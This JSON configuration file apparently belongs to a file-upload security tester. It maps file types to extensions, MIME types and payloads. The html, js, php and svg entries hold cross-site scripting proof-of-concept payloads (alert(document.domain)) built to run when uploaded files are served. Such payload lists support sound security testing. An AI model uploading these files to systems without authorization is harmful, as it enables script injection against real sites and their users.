{
  "html": {
    "Extension": [".html", ".shtml", ".xhtml"],
    "Content-Type": "text/html",
    "Payload": "<script>alert(document.domain)</script>"
  },
  "css": {
    "Extension": [".css", ".scss"],
    "Content-Type": "text/css",
    "Payload": "hello there"
  },
  "js": {
    "Extension": [".js", ".mjs"],
    "Content-Type": "application/javascript",
    "Payload": "alert(document.domain)"
  },
  "jpg": {
    "Extension": [".jpg", ".jpeg"],
    "Content-Type": "image/jpeg",
    "Payload": "hello there"
  },
  "png": {
    "Extension": [".png"],
    "Content-Type": "image/png",
    "Payload": "hello there"
  },
  "php": {
    "Extension": [".php", ".php3", ".php4", ".php5", ".phtml"],
    "Content-Type": "text/html",
    "Payload": "<?php echo '<script> alert(document.domain); </script>';?>"
  },
  "svg": {
    "Extension": [".svg"],
    "Content-Type": "image/svg+xml",
    "Payload": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(document.domain)</script></svg>"
  }
}
